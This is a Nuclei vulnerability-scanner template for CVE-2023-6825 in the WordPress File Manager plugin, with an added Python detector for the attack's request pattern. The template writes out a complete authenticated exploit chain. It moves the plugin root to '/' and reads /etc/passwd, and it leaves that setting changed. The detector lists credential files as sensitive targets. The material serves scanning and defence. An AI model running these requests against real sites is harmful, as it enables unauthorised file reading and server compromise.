id: CVE-2023-6825

info:
  name: WordPress File Manager <= 7.2.1 - Directory Traversal
  author: pussycat0x
  severity: critical
  description: |
    The File Manager and File Manager Pro plugins for WordPress, in versions up to and including 7.2.1 and 8.3.4 respectively, contain a directory traversal via the 'target' parameter of mk_file_folder_manager_action_callback_shortcode. It lets attackers read arbitrary files and upload files outside the designated directories. Exploitation requires administrator privileges in the free version, while lower-privileged users can exploit it in the Pro version.
  impact: |
    Attackers can read sensitive files and upload files outside the permitted directories, potentially leading to information disclosure and server compromise.
  remediation: |
    Update the plugins to versions later than 7.2.1 (free) and 8.3.4 (Pro), or disable them until patched.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/93f377a1-2c33-4dd7-8fd6-190d9148e804
    - https://plugins.trac.wordpress.org/changeset/3023403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N
    cvss-score: 9.9
    cve-id: CVE-2023-6825
    epss-score: 0.06009
    epss-percentile: 0.92393
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 5
    vendor: mndpsingh287
    product: file-manager
    shodan-query: http.component:"WordPress"
    fofa-query: body="wp-file-manager"
  tags: cve,cve2023,wordpress,wp-plugin,wp-file-manager,lfi

# Request block 1 fingerprints the installed version from readme.txt; the
# authenticated exploit chain in block 2 only runs when that version is <= 7.2.1.
flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "File Manager")'
          - 'compare_versions(version, "<= 7.2.1")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      # 1. Log in with the supplied credentials (an administrator for the free version).
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

      # 2. Load the preferences page to obtain the settings-form nonce (pref_nonce).
      - |
        GET /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}

      # 3. Move the File Manager root ("public_path") to the filesystem root "/".
      - |
        POST /wp-admin/admin.php?page=wp_file_manager_preferences HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        public_path=%2F&wp_filemanager_root_nonce_field={{pref_nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp_file_manager_preferences&submit=Save+Changes

      # 4. Load the file manager page to obtain the elFinder connector nonce (fm_nonce).
      - |
        GET /wp-admin/admin.php?page=wp_file_manager HTTP/1.1
        Host: {{Hostname}}

      # 5. Ask the elFinder connector for target l1_ZXRjL3Bhc3N3ZA, which is the
      #    elFinder hash (volume id "l1_" + URL-safe base64) of "etc/passwd"
      #    relative to the root set in step 3.
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce={{fm_nonce}}

    redirects: true
    max-redirects: 3

    extractors:
      - type: regex
        name: pref_nonce
        part: body_2
        group: 1
        regex:
          - 'wp_filemanager_root_nonce_field"[^>]*value="([a-f0-9]+)"'
        internal: true

      - type: regex
        name: fm_nonce
        part: body_4
        group: 1
        regex:
          - '"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code_5 == 200'
          - 'regex("root:.*:0:0:", body_5)'
        condition: and
# digest: 490a0046304402207fe03a88e8af448b7d7a28ba99bb724822264ffaf00891eb5b1b5d310099c02002200f16d04d60685d7055da6f4b09ba489a08b73a917f1c51b3142590748a6179cf:922c64590222798bb761d5b6d8e72950
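What the opaque `target` value in the final request means, and how to spot the request pattern this template produces, as an added Python example (not part of the template or of the plugin's own code). The hash scheme is elFinder's standard one: the root-relative path is base64-encoded, `+/=` are mapped to `-_.`, trailing dots are trimmed and the volume id (`l1_` for the first local volume) is prepended, so `l1_ZXRjL3Bhc3N3ZA` is `etc/passwd` under whatever root the preferences step set. The `WP_ROOT` value, the sensitive-path list, the volume-id pattern and the `METHOD URL [BODY]` log format are assumptions made for this example, and the sample log lines are constructed.

```python
"""Work with elFinder 'target' hashes as used by wp-file-manager, and flag the
request pattern this template produces.  Added example; not part of the Nuclei
template or the plugin.  Standard library only."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# elFinder prefixes every hash with a volume id (driver letter, volume number,
# underscore), e.g. "l1_" for the first local-filesystem volume. Assumed pattern.
_VOLUME_RE = re.compile(r"^([a-z]\d+_)(.*)$")
_TO_SAFE = str.maketrans("+/=", "-_.")
_FROM_SAFE = str.maketrans("-_.", "+/=")

# Assumption for the detector: WordPress lives here, so a File Manager root
# ("public_path") pointing anywhere else is suspicious.
WP_ROOT = "/var/www/html"

# Root-relative paths the connector should never be asked for (assumed list).
SENSITIVE_SUFFIXES = ("etc/passwd", "etc/shadow", "wp-config.php", ".env", ".ssh/id_rsa")


def encode_target(path: str, volume_id: str = "l1_") -> str:
    """Mirror elFinderVolumeDriver::encode(): base64 the root-relative path,
    map '+/=' to '-_.', trim trailing dots, prepend the volume id."""
    rel = path.lstrip("/") or "/"        # elFinder encodes the root itself as "/"
    b64 = base64.b64encode(rel.encode()).decode()
    return volume_id + b64.translate(_TO_SAFE).rstrip(".")


def decode_target(target: str) -> tuple[str, str]:
    """Inverse of encode_target(); returns (volume_id, root-relative path).
    Raises ValueError for hashes that are not well-formed."""
    m = _VOLUME_RE.match(target)
    if not m:
        raise ValueError(f"no elFinder volume prefix in {target!r}")
    volume_id, body = m.groups()
    b64 = body.translate(_FROM_SAFE)
    b64 += "=" * (-len(b64) % 4)         # restore the padding elFinder trimmed
    return volume_id, base64.b64decode(b64, validate=True).decode("utf-8", "replace")


def inspect_request(url: str, body: str = "") -> list[str]:
    """Findings for one request to the plugin's admin endpoints; parameters
    are taken from both the query string and the form body."""
    params = parse_qs(urlsplit(url).query)
    params.update(parse_qs(body))
    findings = []

    # The root move that precedes the read in the template above.
    if params.get("page") == ["wp_file_manager_preferences"] and "public_path" in params:
        root = params["public_path"][0]
        if ".." in root.split("/") or not root.startswith(WP_ROOT):
            findings.append(f"File Manager root changed to {root!r} (outside {WP_ROOT})")

    # The elFinder connector call itself.
    if params.get("action") == ["mk_file_folder_manager"] and "target" in params:
        cmd = params.get("cmd", ["?"])[0]
        for target in params["target"]:
            try:
                _, rel = decode_target(target)
            except ValueError:
                findings.append(f"cmd={cmd}: undecodable target {target!r}")
                continue
            if ".." in rel.split("/"):
                findings.append(f"cmd={cmd}: traversal in target {rel!r}")
            elif rel.endswith(SENSITIVE_SUFFIXES):
                findings.append(f"cmd={cmd}: sensitive target {rel!r}")
    return findings


def scan_log(log: str) -> list[tuple[int, str]]:
    """Run inspect_request() over 'METHOD URL [BODY]' lines; returns (line_no, finding)."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        fields = line.split(" ", 2)
        if len(fields) < 2:
            continue
        body = fields[2] if len(fields) == 3 else ""
        hits.extend((n, f) for f in inspect_request(fields[1], body))
    return hits


# Constructed sample of a request log that keeps POST bodies (as a WAF export
# would); nonces are dummy values. Lines 2, 4 and 5 mirror the template's steps.
SAMPLE_LOG = """\
GET /wp-admin/admin.php?page=wp_file_manager_preferences
POST /wp-admin/admin.php?page=wp_file_manager_preferences public_path=%2F&wp_filemanager_root_nonce_field=deadbeef&submit=Save+Changes
POST /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=open&target=l1_Lw&_wpnonce=cafe0001
POST /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=get&target=l1_ZXRjL3Bhc3N3ZA&_wpnonce=cafe0001
POST /wp-admin/admin-ajax.php action=mk_file_folder_manager&cmd=get&target=l1_Li4vLi4vd3AtY29uZmlnLnBocA&_wpnonce=cafe0001
"""

if __name__ == "__main__":
    print(decode_target("l1_ZXRjL3Bhc3N3ZA"))
    for line_no, finding in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {finding}")
```

The decoded path is relative to whatever root the plugin currently has, so the detector cannot know the absolute file; it therefore flags three things independently: a `public_path` change away from the WordPress tree, `..` segments in a decoded target, and targets ending in well-known sensitive names. Run against the constructed log it reports lines 2, 4 and 5 and stays quiet on the benign `cmd=open` of the root.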